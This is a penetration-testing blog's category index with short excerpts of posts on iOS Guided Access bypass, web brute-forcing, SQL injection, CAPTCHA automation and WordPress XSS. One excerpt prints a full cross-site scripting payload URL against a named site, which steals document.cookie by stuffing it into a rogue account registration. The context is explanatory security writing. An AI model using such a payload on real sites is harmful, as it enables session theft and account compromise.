Category: Penetration Testing
-
Guided Access Mode Bypass
As a penetration tester who specialises in mobile apps, I get good visibility of how the enterprise is adopting/using/misusing various iOS capabilities and MDM features. One trend I’ve seen increasingly, is the use of ‘Guided Access Mode‘ to lock down devices. Guided-Access Mode (GAM), for the unfamiliar, locks the device into a single app. It’s…
-
High Performance Web Brute-Forcing 🕸🐏
Finding and exploiting unique attacks on web applications is, of-course, satisfying. But I also find that performing the most basic of attacks, but as efficiently and effectively as possible, can also pose a decent mental challenge that’s equally rewarding. In this short post i’ll show you how writing just a few lines of code can…
-
Kinda LIKE SQL Injection
TLDR: This post is about some late 90’s level hacking. But the fact is, that there just doesn’t exist a decent explanation of this vulnerability anywhere on the internet.. and yesterday, in 2018, I found another application vulnerable to it (to quite serious effect). I’m afraid that was the straw that broke the camel’s back.…
-
Much Badoo About Nothing
This is just a short post about toying with the Badoo app for iOS, but also touches on something ever-so-slightly useful about testing the app-upgrade mechanisms of mobile apps. “Urghh more dating app hacking” I hear you say. I know, I know, this is getting old. At some point i’ll get a real hobby, I promise.
-
‘App Forgery’
In this (pretty long) post, I’m going to attempt to coin a name for an application vulnerability, most commonly found in mobile apps. This is “App Forgery”.
-
PentestCTF – Another CTF Framework
Instead of doing my final-year project at University, I made (another) open-source CTF/Lab framework, primarily for my own learning benefit during its development, but also because I realised how powerful a group learning environment like a CTF is and I wanted to deploy one at my University. Keep reading to learn more…
-
Gotta Captcha’m All – Automating Image (and Audio!) Captchas.
A captcha serves one purpose. To ensure that a human has performed a task, and not a machine. In web applications, they attempt to prevent attackers from creating automated bits of code to brute-force forms, fuzz user input or cause a denial of service. Its very much a non-trivial task these days to differentiate the man…
-
"Bypassing" CSP’s Data-Exfiltration Protections
A long time ago now, I tweeted a challenge to see of anyone knew what the following URL would attempt to do: http://www.insta-mapper.com/google_map.php?device_id=1234′;$.ajax({url:’/wp-login.php?action=register’,type:’POST’,data:”user_login=’dr’&user_email=’dr@evil.com’&gclient_id=&gredirect_uri=http://www.insta-mapper.com/&state_uri=http://www.insta-mapper.com&client_id=721352147882378&redirect_uri=http://www.insta-mapper.com&ws_plugin__s2member_registration=e4e7762e6a&ws_plugin__s2member_custom_reg_field_user_pass1=’123456’&ws_plugin__s2member_custom_reg_field_user_pass2=’123456’&ws_plugin__s2member_custom_reg_field_first_name=’d’&ws_plugin__s2member_custom_reg_field_last_name=’r’&ws_plugin__s2member_custom_reg_field_address_1=’1’&ws_plugin__s2member_custom_reg_field_address_2=&ws_plugin__s2member_custom_reg_field_city=s&ws_plugin__s2member_custom_reg_field_country=u&ws_plugin__s2member_custom_reg_field_mobile_devices='” encodeURI(document.cookie) “‘&ws_plugin__s2member_custom_reg_field_mobile_devices2=Apple&redirect_to=&wp-submit=Register”});var lol=’a Don’t worry, I don’t expect you to stare at that monstrosity. Instead I’ll just tell you; So a friend of mine was competing in WhiteHatRally last year, which is a sort…
-
Hunting bad regex with good regex.
In this post i’ll look at how a simple regex flaw I found on a web application, lead me down a pretty big exploratory hole of trying to search for regex vulnerabilities in applications… using regex; the results of which have since been useful on many of my engagements.
-
WordPress – CSRF>XSS>Shell>Profit.
I did a small penetration test in 2013/14 for a client’s WordPress site, which has since been my go-to anecdote for explaining the potential for XSS… probably because, to non-sec folk, what it achieved sounds amazing, although its really rather easy to explain how and why it worked. This is that anecdote…
hiburn8 📈🔥🎱 